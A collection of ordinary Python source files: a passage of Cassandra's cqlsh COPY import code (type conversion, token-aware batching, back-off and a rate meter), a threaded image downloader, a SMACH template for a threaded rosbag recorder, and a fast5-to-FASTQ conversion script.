return convert_single_subtype(val, ct=ct)
printdebugmsg("Unknown type %s (%s) for val %s" % (ct, ct.typename, val))
return val
converters = {
'blob': convert_blob,
'decimal': get_convert_decimal_fcn(adapter=Decimal),
'uuid': convert_uuid,
'boolean': convert_bool,
'tinyint': get_convert_integer_fcn(),
'ascii': convert_text,
'float': get_convert_decimal_fcn(),
'double': get_convert_decimal_fcn(),
'bigint': get_convert_integer_fcn(adapter=int),
'int': get_convert_integer_fcn(),
'varint': get_convert_integer_fcn(),
'inet': convert_text,
'counter': get_convert_integer_fcn(adapter=int),
'timestamp': convert_datetime,
'timeuuid': convert_uuid,
'date': convert_date,
'smallint': get_convert_integer_fcn(),
'time': convert_time,
'text': convert_text,
'varchar': convert_text,
'list': convert_list,
'set': convert_set,
'map': convert_map,
'tuple': convert_tuple,
'frozen': convert_single_subtype,
}
return converters.get(cql_type.typename, convert_unknown)
def get_null_val(self):
"""
Return the null value that is inserted for fields that are missing from csv files.
For counters we should return zero so that the counter value won't be incremented.
For everything else we return nulls, this means None if we use prepared statements
or "NULL" otherwise. Note that for counters we never use prepared statements, so we
only check is_counter when use_prepared_statements is false.
"""
return None if self.use_prepared_statements else (ensure_str("0") if self.is_counter else ensure_str("NULL"))
def convert_row(self, row):
"""
Convert the row into a list of parsed values if using prepared statements, else simply apply the
        protection functions to escape values with quotes when required. Also check the row length and
        make sure primary key values aren't missing.
"""
converters = self.converters if self.use_prepared_statements else self.protectors
if len(row) != len(converters):
raise ParseError('Invalid row length %d should be %d' % (len(row), len(converters)))
for i in self.primary_key_indexes:
if row[i] == self.nullval:
raise ParseError(self.get_null_primary_key_message(i))
def convert(c, v):
try:
return c(v) if v != self.nullval else self.get_null_val()
except Exception as e:
# if we could not convert an empty string, then self.nullval has been set to a marker
# because the user needs to import empty strings, except that the converters for some types
# will fail to convert an empty string, in this case the null value should be inserted
# see CASSANDRA-12794
if v == '':
return self.get_null_val()
if self.debug:
traceback.print_exc()
raise ParseError("Failed to parse %s : %s" % (v, e.message if hasattr(e, 'message') else str(e)))
return [convert(conv, val) for conv, val in zip(converters, row)]
def get_null_primary_key_message(self, idx):
message = "Cannot insert null value for primary key column '%s'." % (self.columns[idx],)
if self.nullval == '':
message += " If you want to insert empty strings, consider using" \
" the WITH NULL=<marker> option for COPY."
return message
def get_row_partition_key_values_fcn(self):
"""
Return a function to convert a row into a string composed of the partition key values serialized
and binary packed (the tokens on the ring). Depending on whether we are using prepared statements, we
may have to convert the primary key values first, so we have two different serialize_value implementations.
We also return different functions depending on how many partition key indexes we have (single or multiple).
See also BoundStatement.routing_key.
"""
def serialize_value_prepared(n, v):
return self.cqltypes[n].serialize(v, self.proto_version)
def serialize_value_not_prepared(n, v):
return self.cqltypes[n].serialize(self.converters[n](self.unprotect(v)), self.proto_version)
partition_key_indexes = self.partition_key_indexes
serialize = serialize_value_prepared if self.use_prepared_statements else serialize_value_not_prepared
def serialize_row_single(row):
return serialize(partition_key_indexes[0], row[partition_key_indexes[0]])
def serialize_row_multiple(row):
pk_values = []
for i in partition_key_indexes:
val = serialize(i, row[i])
length = len(val)
pk_values.append(struct.pack(">H%dsB" % length, length, val, 0))
return b"".join(pk_values)
if len(partition_key_indexes) == 1:
return serialize_row_single
return serialize_row_multiple
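# Illustrative sketch: for a composite partition key the routing key is built by concatenating, for each
# component, a 2-byte big-endian length, the serialized bytes and a trailing zero byte, as in
# serialize_row_multiple() above. A stand-alone equivalent of the packing step:
def _example_pack_routing_key(serialized_components):
    import struct
    return b"".join(struct.pack(">H%dsB" % len(v), len(v), v, 0) for v in serialized_components)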
class TokenMap(object):
"""
A wrapper around the metadata token map to speed things up by caching ring token *values* and
replicas. It is very important that we use the token values, which are primitive types, rather
than the tokens classes when calling bisect_right() in split_batches(). If we use primitive values,
the bisect is done in compiled code whilst with token classes each comparison requires a call
into the interpreter to perform the cmp operation defined in Python. A simple test with 1 million bisect
operations on an array of 2048 tokens was done in 0.37 seconds with primitives and 2.25 seconds with
token classes. This is significant for large datasets because we need to do a bisect for each single row,
and if VNODES are used, the size of the token map can get quite large too.
"""
def __init__(self, ks, hostname, local_dc, session):
self.ks = ks
self.hostname = hostname
self.local_dc = local_dc
self.metadata = session.cluster.metadata
self._initialize_ring()
        # Note that refresh metadata is disabled by default and we currently do not intercept it
# If hosts are added, removed or moved during a COPY operation our token map is no longer optimal
# However we can cope with hosts going down and up since we filter for replicas that are up when
# making each batch
def _initialize_ring(self):
token_map = self.metadata.token_map
if token_map is None:
self.ring = [0]
self.replicas = [(self.metadata.get_host(self.hostname),)]
self.pk_to_token_value = lambda pk: 0
return
token_map.rebuild_keyspace(self.ks, build_if_absent=True)
tokens_to_hosts = token_map.tokens_to_hosts_by_ks.get(self.ks, None)
from_key = token_map.token_class.from_key
self.ring = [token.value for token in token_map.ring]
self.replicas = [tuple(tokens_to_hosts[token]) for token in token_map.ring]
self.pk_to_token_value = lambda pk: from_key(pk).value
@staticmethod
def get_ring_pos(ring, val):
idx = bisect_right(ring, val)
return idx if idx < len(ring) else 0
def filter_replicas(self, hosts):
shuffled = tuple(sorted(hosts, key=lambda k: random.random()))
return [r for r in shuffled if r.is_up is not False and r.datacenter == self.local_dc] if hosts else ()
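# Illustrative sketch: get_ring_pos() bisects the cached primitive token values and wraps past the last
# token back to position 0, which owns the wrap-around range. Stand-alone form of the same lookup:
def _example_ring_pos(ring_values, token_value):
    from bisect import bisect_right
    idx = bisect_right(ring_values, token_value)
    return idx if idx < len(ring_values) else 0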
class FastTokenAwarePolicy(DCAwareRoundRobinPolicy):
"""
Send to any replicas attached to the query, or else fall back to DCAwareRoundRobinPolicy. Perform
exponential back-off if too many in flight requests to all replicas are already in progress.
"""
def __init__(self, parent):
DCAwareRoundRobinPolicy.__init__(self, parent.local_dc, 0)
self.max_backoff_attempts = parent.max_backoff_attempts
self.max_inflight_messages = parent.max_inflight_messages
def make_query_plan(self, working_keyspace=None, query=None):
"""
Extend TokenAwarePolicy.make_query_plan() so that we choose the same replicas in preference
and most importantly we avoid repeating the (slow) bisect. We also implement a backoff policy
by sleeping an exponentially larger delay in case all connections to eligible replicas have
too many in flight requests.
"""
connections = ConnectionWrapper.connections
replicas = list(query.replicas) if hasattr(query, 'replicas') else []
replicas.extend([r for r in DCAwareRoundRobinPolicy.make_query_plan(self, working_keyspace, query)
if r not in replicas])
if replicas:
def replica_is_not_overloaded(r):
if r.address in connections:
conn = connections[r.address]
return conn.in_flight < min(conn.max_request_id, self.max_inflight_messages)
return True
for i in range(self.max_backoff_attempts):
for r in filter(replica_is_not_overloaded, replicas):
yield r
                # the back-off starts at 10 ms (0.01) and the random step count can go up to 2^max_backoff_attempts,
                # which is currently 12, so at most 2^12 * 0.01 = ~40 seconds
delay = randint(1, pow(2, i + 1)) * 0.01
printdebugmsg("All replicas busy, sleeping for %d second(s)..." % (delay,))
time.sleep(delay)
printdebugmsg("Replicas too busy, given up")
class ConnectionWrapper(DefaultConnection):
"""
A wrapper to the driver default connection that helps in keeping track of messages in flight.
The newly created connection is registered into a global dictionary so that FastTokenAwarePolicy
is able to determine if a connection has too many in flight requests.
"""
connections = {}
def __init__(self, *args, **kwargs):
DefaultConnection.__init__(self, *args, **kwargs)
self.connections[self.host] = self
class ImportProcess(ChildProcess):
def __init__(self, params):
ChildProcess.__init__(self, params=params, target=self.run)
self.skip_columns = params['skip_columns']
self.valid_columns = [c for c in params['valid_columns']]
self.skip_column_indexes = [i for i, c in enumerate(self.columns) if c in self.skip_columns]
options = params['options']
self.nullval = options.copy['nullval']
self.max_attempts = options.copy['maxattempts']
self.min_batch_size = options.copy['minbatchsize']
self.max_batch_size = options.copy['maxbatchsize']
self.use_prepared_statements = options.copy['preparedstatements']
self.ttl = options.copy['ttl']
self.max_inflight_messages = options.copy['maxinflightmessages']
self.max_backoff_attempts = options.copy['maxbackoffattempts']
self.request_timeout = options.copy['requesttimeout']
self.dialect_options = options.dialect
self._session = None
self.query = None
self.conv = None
self.make_statement = None
@property
def session(self):
if not self._session:
cluster = Cluster(
contact_points=(self.hostname,),
port=self.port,
cql_version=self.cql_version,
protocol_version=self.protocol_version,
auth_provider=self.auth_provider,
load_balancing_policy=FastTokenAwarePolicy(self),
ssl_options=ssl_settings(self.hostname, self.config_file) if self.ssl else None,
default_retry_policy=FallthroughRetryPolicy(), # we throw on timeouts and retry in the error callback
compression=None,
control_connection_timeout=self.connect_timeout,
connect_timeout=self.connect_timeout,
idle_heartbeat_interval=0,
connection_class=ConnectionWrapper)
self._session = cluster.connect(self.ks)
self._session.default_timeout = self.request_timeout
return self._session
def run(self):
if self.coverage:
self.start_coverage()
try:
pr = profile_on() if PROFILE_ON else None
self.on_fork()
self.inner_run(*self.make_params())
if pr:
profile_off(pr, file_name='worker_profile_%d.txt' % (os.getpid(),))
except Exception as exc:
self.report_error(exc)
finally:
if self.coverage:
self.stop_coverage()
self.close()
def close(self):
if self._session:
self._session.cluster.shutdown()
ChildProcess.close(self)
def is_counter(self, table_meta):
return "counter" in [table_meta.columns[name].cql_type for name in self.valid_columns]
def make_params(self):
metadata = self.session.cluster.metadata
table_meta = metadata.keyspaces[self.ks].tables[self.table]
prepared_statement = None
if self.is_counter(table_meta):
query = 'UPDATE %s.%s SET %%s WHERE %%s' % (protect_name(self.ks), protect_name(self.table))
make_statement = self.wrap_make_statement(self.make_counter_batch_statement)
elif self.use_prepared_statements:
query = 'INSERT INTO %s.%s (%s) VALUES (%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),),
', '.join(['?' for _ in self.valid_columns]))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
query = self.session.prepare(query)
query.consistency_level = self.consistency_level
prepared_statement = query
make_statement = self.wrap_make_statement(self.make_prepared_batch_statement)
else:
query = 'INSERT INTO %s.%s (%s) VALUES (%%s)' % (protect_name(self.ks),
protect_name(self.table),
', '.join(protect_names(self.valid_columns),))
if self.ttl >= 0:
query += 'USING TTL %s' % (self.ttl,)
make_statement = self.wrap_make_statement(self.make_non_prepared_batch_statement)
query = ensure_str(query)
conv = ImportConversion(self, table_meta, prepared_statement)
tm = TokenMap(self.ks, self.hostname, self.local_dc, self.session)
return query, conv, tm, make_statement
def inner_run(self, query, conv, tm, make_statement):
"""
        Main run method. Note that we bind instance methods to local names when they are called inside loops,
        for performance reasons.
"""
self.query = query
self.conv = conv
self.make_statement = make_statement
convert_rows = self.convert_rows
split_into_batches = self.split_into_batches
result_callback = self.result_callback
err_callback = self.err_callback
session = self.session
while True:
chunk = self.inmsg.recv()
if chunk is None:
break
try:
chunk['rows'] = convert_rows(conv, chunk)
for replicas, batch in split_into_batches(chunk, conv, tm):
statement = make_statement(query, conv, chunk, batch, replicas)
if statement:
future = session.execute_async(statement)
future.add_callbacks(callback=result_callback, callback_args=(batch, chunk),
errback=err_callback, errback_args=(batch, chunk, replicas))
                        # no else case: if a statement could not be created, the exception is handled
                        # in self.wrap_make_statement and the error is reported there; if an injected test failure
                        # causes the statement to be None, then we deliberately do not report the error so that we can
                        # test how the parent process handles missing batches from child processes
except Exception as exc:
self.report_error(exc, chunk, chunk['rows'])
def wrap_make_statement(self, inner_make_statement):
def make_statement(query, conv, chunk, batch, replicas):
try:
return inner_make_statement(query, conv, batch, replicas)
except Exception as exc:
print("Failed to make batch statement: {}".format(exc))
self.report_error(exc, chunk, batch['rows'])
return None
def make_statement_with_failures(query, conv, chunk, batch, replicas):
failed_batch, apply_failure = self.maybe_inject_failures(batch)
if apply_failure:
return failed_batch
return make_statement(query, conv, chunk, batch, replicas)
return make_statement_with_failures if self.test_failures else make_statement
def make_counter_batch_statement(self, query, conv, batch, replicas):
statement = BatchStatement(batch_type=BatchType.COUNTER, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
for row in batch['rows']:
where_clause = []
set_clause = []
for i, value in enumerate(row):
if i in conv.primary_key_indexes:
where_clause.append(ensure_text("{}={}").format(self.valid_columns[i], ensure_text(value)))
else:
set_clause.append(ensure_text("{}={}+{}").format(self.valid_columns[i], self.valid_columns[i], ensure_text(value)))
full_query_text = query % (ensure_text(',').join(set_clause), ensure_text(' AND ').join(where_clause))
statement.add(ensure_str(full_query_text))
return statement
def make_prepared_batch_statement(self, query, _, batch, replicas):
"""
Return a batch statement. This is an optimized version of:
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
for row in batch['rows']:
statement.add(query, row)
We could optimize further by removing bound_statements altogether but we'd have to duplicate much
more driver's code (BoundStatement.bind()).
"""
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
statement._statements_and_parameters = [(True, query.query_id, query.bind(r).values) for r in batch['rows']]
return statement
def make_non_prepared_batch_statement(self, query, _, batch, replicas):
statement = BatchStatement(batch_type=BatchType.UNLOGGED, consistency_level=self.consistency_level)
statement.replicas = replicas
statement.keyspace = self.ks
field_sep = b',' if six.PY2 else ','
statement._statements_and_parameters = [(False, query % (field_sep.join(r),), ()) for r in batch['rows']]
return statement
def convert_rows(self, conv, chunk):
"""
Return converted rows and report any errors during conversion.
"""
def filter_row_values(row):
return [v for i, v in enumerate(row) if i not in self.skip_column_indexes]
if self.skip_column_indexes:
rows = [filter_row_values(r) for r in list(csv.reader(chunk['rows'], **self.dialect_options))]
else:
rows = list(csv.reader(chunk['rows'], **self.dialect_options))
errors = defaultdict(list)
def convert_row(r):
try:
return conv.convert_row(r)
except Exception as err:
errors[err.message if hasattr(err, 'message') else str(err)].append(r)
return None
converted_rows = [_f for _f in [convert_row(r) for r in rows] if _f]
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
return converted_rows
def maybe_inject_failures(self, batch):
"""
Examine self.test_failures and see if the batch is a batch
supposed to cause a failure (failing_batch), or to terminate the worker process
(exit_batch), or not to be sent (unsent_batch).
@return any statement that will cause a failure or None if the statement should not be sent
plus a boolean indicating if a failure should be applied at all
"""
if 'failing_batch' in self.test_failures:
failing_batch = self.test_failures['failing_batch']
if failing_batch['id'] == batch['id']:
if batch['attempts'] < failing_batch['failures']:
statement = SimpleStatement("INSERT INTO badtable (a, b) VALUES (1, 2)",
consistency_level=self.consistency_level)
return statement, True # use this statement, which will cause an error
if 'exit_batch' in self.test_failures:
exit_batch = self.test_failures['exit_batch']
if exit_batch['id'] == batch['id']:
sys.exit(1)
if 'unsent_batch' in self.test_failures:
unsent_batch = self.test_failures['unsent_batch']
if unsent_batch['id'] == batch['id']:
return None, True # do not send this batch, which will cause missing acks in the parent process
return None, False # carry on as normal, do not apply any failures
@staticmethod
def make_batch(batch_id, rows, attempts=1):
return {'id': batch_id, 'rows': rows, 'attempts': attempts}
def split_into_batches(self, chunk, conv, tm):
"""
Batch rows by ring position or replica.
If there are at least min_batch_size rows for a ring position then split these rows into
groups of max_batch_size and send a batch for each group, using all replicas for this ring position.
Otherwise, we are forced to batch by replica, and here unfortunately we can only choose one replica to
guarantee common replicas across partition keys. We are typically able
to batch by ring position for small clusters or when VNODES are not used. For large clusters with VNODES
        it may not be possible; in this case it helps to increase the CHUNK SIZE, but only up to a limit, otherwise
we may choke the cluster.
"""
rows_by_ring_pos = defaultdict(list)
errors = defaultdict(list)
min_batch_size = self.min_batch_size
max_batch_size = self.max_batch_size
ring = tm.ring
get_row_partition_key_values = conv.get_row_partition_key_values_fcn()
pk_to_token_value = tm.pk_to_token_value
get_ring_pos = tm.get_ring_pos
make_batch = self.make_batch
for row in chunk['rows']:
try:
pk = get_row_partition_key_values(row)
rows_by_ring_pos[get_ring_pos(ring, pk_to_token_value(pk))].append(row)
except Exception as e:
errors[e.message if hasattr(e, 'message') else str(e)].append(row)
if errors:
for msg, rows in errors.items():
self.report_error(ParseError(msg), chunk, rows)
replicas = tm.replicas
filter_replicas = tm.filter_replicas
rows_by_replica = defaultdict(list)
for ring_pos, rows in rows_by_ring_pos.items():
if len(rows) > min_batch_size:
for i in range(0, len(rows), max_batch_size):
yield filter_replicas(replicas[ring_pos]), make_batch(chunk['id'], rows[i:i + max_batch_size])
else:
# select only the first valid replica to guarantee more overlap or none at all
rows_by_replica[tuple(filter_replicas(replicas[ring_pos])[:1])].extend(rows) # TODO: revisit tuple wrapper
# Now send the batches by replica
for replicas, rows in rows_by_replica.items():
for i in range(0, len(rows), max_batch_size):
yield replicas, make_batch(chunk['id'], rows[i:i + max_batch_size])
def result_callback(self, _, batch, chunk):
self.update_chunk(batch['rows'], chunk)
def err_callback(self, response, batch, chunk, replicas):
if isinstance(response, OperationTimedOut) and chunk['imported'] == chunk['num_rows_sent']:
return # occasionally the driver sends false timeouts for rows already processed (PYTHON-652)
err_is_final = batch['attempts'] >= self.max_attempts
self.report_error(response, chunk, batch['rows'], batch['attempts'], err_is_final)
if not err_is_final:
batch['attempts'] += 1
statement = self.make_statement(self.query, self.conv, chunk, batch, replicas)
future = self.session.execute_async(statement)
future.add_callbacks(callback=self.result_callback, callback_args=(batch, chunk),
errback=self.err_callback, errback_args=(batch, chunk, replicas))
def report_error(self, err, chunk=None, rows=None, attempts=1, final=True):
if self.debug and sys.exc_info()[1] == err:
traceback.print_exc()
err_msg = err.message if hasattr(err, 'message') else str(err)
self.outmsg.send(ImportTaskError(err.__class__.__name__, err_msg, rows, attempts, final))
if final and chunk is not None:
self.update_chunk(rows, chunk)
def update_chunk(self, rows, chunk):
chunk['imported'] += len(rows)
if chunk['imported'] == chunk['num_rows_sent']:
self.outmsg.send(ImportProcessResult(chunk['num_rows_sent']))
class RateMeter(object):
def __init__(self, log_fcn, update_interval=0.25, log_file=''):
self.log_fcn = log_fcn # the function for logging, may be None to disable logging
self.update_interval = update_interval # how often we update in seconds
self.log_file = log_file # an optional file where to log statistics in addition to stdout
self.start_time = time.time() # the start time
self.last_checkpoint_time = self.start_time # last time we logged
self.current_rate = 0.0 # rows per second
self.current_record = 0 # number of records since we last updated
self.total_records = 0 # total number of records
if os.path.isfile(self.log_file):
os.unlink(self.log_file)
def increment(self, n=1):
self.current_record += n
self.maybe_update()
def maybe_update(self, sleep=False):
if self.current_record == 0:
return
new_checkpoint_time = time.time()
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= self.update_interval:
self.update(new_checkpoint_time)
self.log_message()
elif sleep:
# sleep until the next update is due
remaining_time = self.update_interval - time_difference
if remaining_time > 0.000001:
time.sleep(remaining_time)
def update(self, new_checkpoint_time):
time_difference = new_checkpoint_time - self.last_checkpoint_time
if time_difference >= 1e-09:
self.current_rate = self.get_new_rate(self.current_record / time_difference)
self.last_checkpoint_time = new_checkpoint_time
self.total_records += self.current_record
self.current_record = 0
def get_new_rate(self, new_rate):
"""
return the rate of the last period: this is the new rate but
averaged with the last rate to smooth a bit
"""
if self.current_rate == 0.0:
return new_rate
else:
return (self.current_rate + new_rate) / 2.0
def get_avg_rate(self):
"""
return the average rate since we started measuring
"""
time_difference = time.time() - self.start_time
return self.total_records / time_difference if time_difference >= 1e-09 else 0
def log_message(self):
if not self.log_fcn:
return
output = 'Processed: %d rows; Rate: %7.0f rows/s; Avg. rate: %7.0f rows/s\r' % \
(self.total_records, self.current_rate, self.get_avg_rate())
self.log_fcn(output, eol='\r')
if self.log_file:
with open(self.log_file, "a") as f:
f.write(output + '\n')
def get_total_records(self):
self.update(time.time())
self.log_message()
return self.total_records
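# Minimal usage sketch for RateMeter (illustrative only, not part of the original module;
# printmsg is a hypothetical logging function):
#   meter = RateMeter(log_fcn=printmsg, update_interval=0.25)
#   for row in rows:
#       meter.increment()
#   total = meter.get_total_records()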
|
image_utils.py
|
import io
import requests
from PIL import Image
from utils_all.utils_all import *
import threading
import os
import time
thread_pools=[]
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True  # important to avoid PIL errors when loading truncated or partially downloaded images
def download_images(img_urls,save_files,size=(512,512), no_threads=6):
for i in range(len(img_urls)):
while True:
img_url = img_urls[i]
save_file = save_files[i]
t = threading.Thread(target=download_image, args=(img_url, save_file, size, len(img_urls), (i + 1)))
if len(thread_pools) < no_threads:
t.start()
thread_pools.append(save_file)
break
time.sleep(0.01)  # avoid busy-waiting while all download slots are occupied
def download_image(img_url,save_file,size,total=None, progress=None):
try:
if os.path.exists(save_file):
img=Image.open(save_file)
if img is not None:
thread_pools.remove(save_file)
# shutil.copy(save_file,os.path.join('/media/milton/ssd1/research/competitions/ISIC_2018_data/data/aditional_training_data/MEL', os.path.basename(save_file)))
return
except Exception as e:
pass
progress_bar(progress,total,"Downloaded: {}".format(save_file))
r = requests.get(img_url)
if r.status_code != requests.codes.ok:
assert False, 'Status code error: {}.'.format(r.status_code)
with Image.open(io.BytesIO(r.content)) as img:
img = img.convert('RGB')
img.save(save_file, quality=100)
img1 = Image.open(save_file)
img1 = img1.resize(size)  # Image.resize returns a new image; keep the result before saving
img1.save(save_file)
thread_pools.remove(save_file)
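# Usage sketch (hypothetical URLs and paths, for illustration only):
#   urls = ['http://example.com/a.jpg', 'http://example.com/b.jpg']
#   files = ['/tmp/a.jpg', '/tmp/b.jpg']
#   download_images(urls, files, size=(512, 512), no_threads=2)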
|
ROSBagAPIThreadRecorder.tpl.py
|
{% block meta %}
name: ROSBagAPIThreadRecorder
description: >
SMACH template that provides a ROSBagAPIThreadRecorder helper class for
RecordROSBagState. It uses the rosbag API (application programming interface)
as well as the threading library in order to manage multiple recording
threads. NOTE: this means that this recorder may have issues with the Python
GIL (global interpreter lock) when other threads (e.g. MoveIt! commands)
block execution.
Based in part on code from:
https://github.com/francisc0garcia/sensor_board/blob/master/src/classes/bags/recorder.py
language: Python
framework: SMACH
type: None
tags: [core]
includes: []
extends: []
variables: []
input_keys: []
output_keys: []
{% endblock meta %}
{% from "Utils.tpl.py" import import_module, from_import %}
{% block imports %}
{{ import_module(defined_headers, 'rospy') }}
{{ import_module(defined_headers, 'rosbag') }}
{{ import_module(defined_headers, 'roslib') }}
{{ import_module(defined_headers, 'rosgraph') }}
{{ import_module(defined_headers, 'threading') }}
{% if 'import_Queue' not in defined_headers %}
try:
from queue import Queue
except ImportError:
from Queue import Queue
{% do defined_headers.append('import_Queue') %}
{% endif %}
{% endblock imports %}
{% block class_defs %}
{% if 'class_ROSBagAPIThreadRecorder' not in defined_headers %}
class ROSBagAPIThreadRecorder(object):
"""A rosbag recorder class that uses the rosbag API (application
programming interface) as well as the threading library in order to manage
multiple recording threads. NOTE: this means that this recorder may have
issues with the Python GIL (global interpreter lock) when other threads (e.g.
MoveIt! commands) block execution.
"""
def __init__(self):
# Get a reference to the ROS master
self._master = rosgraph.Master('rosbag_recorder_observer')
# A dict of bag master check threads indexed by bag filenames
self._master_check_threads = dict()
# The rate at which to poll the ROS master for new topics
self._master_check_interval = 0.1
# A dict of rosbags indexed by filenames
self._bags = dict()
# A dict of bag writing threads indexed by bag filenames
self._write_threads = dict()
# A dict of bag writing queues indexed by bag filenames
self._write_queues = dict()
# A dict of bag writing stop flags indexed by bag filenames
self._stop_flags = dict()
# A dict of bag thread stop conditions indexed by bag filenames
self._stop_conditions = dict()
# A dict of bag file locks indexed by bag filenames
self._bag_locks = dict()
# A dict of dicts of subscribers indexed by bag_files and topics
# respectively
self._bag_subs = dict()
# Length of timeout (in seconds), as well as sleep rate, for waiting
# for the threads to finish writing before forcibly closing a bag.
self._bag_close_timeout = 10.0
self._bag_close_sleep_rate = 100.0
def _write_cb(self, msg, args):
bag_file = args[0]
topic = args[1]
msg_class = args[2]
try:
self._write_queues[bag_file].put((topic, msg, rospy.get_rostime()))
except Exception as e:
rospy.logwarn('Failed to write message of type {} from topic {} to rosbag {}: {}'.format(msg_class, topic, bag_file, repr(e)))
pass
def _run_master_check_thread(self, bag_file, topics):
# Set up an observer loop
try:
while not self._stop_flags[bag_file]:
# Get a list of topics currently being published
currently_published_topics = []
try:
currently_published_topics = self._master.getPublishedTopics('')
except Exception as e:
# TODO: Allow this warning to be included if a
# debug/verbosity flag is passed to the state.
# rospy.logwarn('Failed to get list of currently published topics from ROS master: {}'.format(repr(e)))
pass
# Check for new topics
for topic, msg_type in currently_published_topics:
# If the topic has previously been subscribed to for this
# bag_file, or is not listed as a topic for this bag_file,
# skip it.
if topic in list(self._bag_subs[bag_file].keys()) or (topic not in topics and topic.strip('/') not in topics):
continue
# Subscribe to the topic
try:
msg_class = roslib.message.get_message_class(msg_type)
self._bag_subs[bag_file][topic] = rospy.Subscriber(topic, msg_class, self._write_cb, (bag_file, topic, msg_class))
except Exception as e:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
raise ValueError('Failed to subscribe to topic {}: {}'.format(topic, repr(e)))
# Wait a while
self._stop_conditions[bag_file].acquire()
self._stop_conditions[bag_file].wait(self._master_check_interval)
except Exception as e:
rospy.logerr('Error when recording rosbag file {}: {}'.format(bag_file, repr(e)))
# Unsubscribe from topics and close bag
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
def _unsubscribe_bag_topics(self, bag_file):
for _, sub in self._bag_subs[bag_file].items():
try:
sub.unregister()
except Exception as e:
rospy.logerr('Failed to unregister topic subscriber {} while stopping rosbag recording with filename \'{}\': {}'.format(sub, bag_file, repr(e)))
raise
del self._bag_subs[bag_file]
def _close_bag(self, bag_file):
try:
with self._bag_locks[bag_file]:
self._bags[bag_file].close()
except Exception as e:
rospy.logerr('Failed to close rosbag with filename \'{}\': {}'.format(bag_file, repr(e)))
raise
del self._bags[bag_file]
def _run_write_thread(self, bag_file):
try:
while not self._stop_flags[bag_file]:
# Wait for a message
item = self._write_queues[bag_file].get()
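# stop() places the recorder object itself on the queue as a sentinel, so this
# blocking get() wakes up and the stop flag can be re-checked.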
if item == self:
continue
topic, msg, t = item
# Write to the bag
with self._bag_locks[bag_file]:
self._bags[bag_file].write(topic, msg, t)
except Exception as e:
rospy.logerr('Error when writing to rosbag file {}: {}'.format(bag_file, repr(e)))
def start(self, bag_file, topics):
"""Start a rosbag recording.
"""
# Open the bag file for writing
try:
assert(bag_file not in self._bags.keys())
self._bags[bag_file] = rosbag.Bag(bag_file, 'w')
self._bag_subs[bag_file] = dict()
except Exception as e:
rospy.logerr('Failed to start rosbag recording with filename \'{}\': {}'.format(bag_file, repr(e)))
return 'aborted'
# Set up the bag writing queue
self._write_queues[bag_file] = Queue()
# Set the bag thread lock, write stopping flag, and thread stopping conditions
self._bag_locks[bag_file] = threading.Lock()
self._stop_flags[bag_file] = False
self._stop_conditions[bag_file] = threading.Condition()
# Spin up the master check and bag writing threads
self._master_check_threads[bag_file] = threading.Thread(target=self._run_master_check_thread, args=[bag_file, topics])
self._write_threads[bag_file] = threading.Thread(target=self._run_write_thread, args=[bag_file])
self._master_check_threads[bag_file].start()
self._write_threads[bag_file].start()
return 'succeeded'
def stop(self, bag_file):
"""Stop a rosbag recording.
"""
# Signal threads to stop bag recording
with self._stop_conditions[bag_file]:
self._stop_flags[bag_file] = True
self._stop_conditions[bag_file].notify_all()
# Signal the bag write thread to stop writing
self._write_queues[bag_file].put(self)
# Wait for the bag to be closed
t = rospy.get_time()
r = rospy.Rate(self._bag_close_sleep_rate)
while bag_file in list(self._bags.keys()):
if rospy.get_time() - t < self._bag_close_timeout:
r.sleep()
else:
break
else:
return 'succeeded'
# If the bag is still open, issue a warning and attempt forced closure.
rospy.logwarn('Warning: timeout exceeded for stopping writing to rosbag file {}. Attempting forced stop...'.format(bag_file))
try:
self._unsubscribe_bag_topics(bag_file)
self._close_bag(bag_file)
except Exception as e:
rospy.logerr('Error during forced stop of writing to rosbag file {}: {}'.format(bag_file, repr(e)))
return 'aborted'
return 'succeeded'
def stop_all(self):
"""Stop all rosbag recordings.
"""
# Stop all current recordings
for bag_file in list(self._bags.keys()):
if self.stop(bag_file) != 'succeeded':
return 'aborted'
return 'succeeded'
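# Usage sketch (bag path and topic names are illustrative only):
#   recorder = ROSBagAPIThreadRecorder()
#   recorder.start('/tmp/demo.bag', ['/tf', '/joint_states'])
#   ...  # let the recording threads run for a while
#   recorder.stop('/tmp/demo.bag')   # or recorder.stop_all() to close every open bag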
{% do defined_headers.append('class_ROSBagAPIThreadRecorder') %}{% endif %}
{% endblock class_defs %}
|
ben_test.py
|
import os
from ont_fast5_api.fast5_interface import get_fast5_file
from ont_fast5_api.analysis_tools.basecall_1d import Basecall1DTools
import time
from multiprocessing import Pool, Process
from joblib import Parallel, delayed
def fast5s_to_fastq(dir_):
print(dir_)
start = time.time()
plus = '+'
fastq_fn = os.path.join(dir_, os.path.basename(dir_) + '.fastq')
fast5s = [os.path.join(dir_ ,x) for x in os.listdir(dir_) if x.endswith('.fast5') ]
n = []
s = []
q = []
for fast5_fn in fast5s:
with get_fast5_file(fast5_fn, mode='r') as f5:
with Basecall1DTools(f5) as basecall:
n1, s1, q1 = basecall.get_called_sequence('template')
n.append(n1)
s.append(s1)
q.append(q1)
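# Write one FASTQ record per read: '@' + read name, the called sequence,
# a '+' separator line, and the per-base quality string.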
with open(fastq_fn, mode='w') as fastq_fh:
for (n1, s1, q1) in zip(n, s, q):
print('@%s' % n1, file=fastq_fh)
print(s1, file=fastq_fh)
print(plus, file=fastq_fh)
print(q1, file=fastq_fh)
string = '%s done' % fastq_fn
stop = time.time()
string = string + ': Done in {:.2f}'.format(stop - start)
print(string)
return string
if __name__ == '__main__':
BAMIN_DIR = '../../analyses/mapping/infected_leaves/infected_leaves_2/'
FAST5IN_DIR = '../../data/genomic_data/infected_leaves/workspace_fast5/infected_leaves_2_fast5_out/'
FAST5singleIN_DIR = '../../analyses/single_fast5s/infected_leaves/infected_leaves_2_fast5_single_fast5/'
OUT_DIR = '../../analyses/single_fast5s/infected_leaves/infected_leaves_2_mapped_single_fast5/'
n_threads = 10
